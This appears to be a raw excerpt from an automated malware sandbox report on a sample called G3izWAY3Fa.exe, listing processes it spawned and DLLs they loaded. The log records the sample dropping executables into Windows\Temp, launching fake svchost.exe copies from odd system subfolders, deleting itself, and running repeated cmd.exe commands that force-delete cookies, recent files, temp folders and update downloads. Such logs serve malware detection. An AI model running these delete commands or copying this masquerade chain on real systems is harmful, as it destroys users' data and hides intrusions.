Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wldp.dll	Jump to behavior
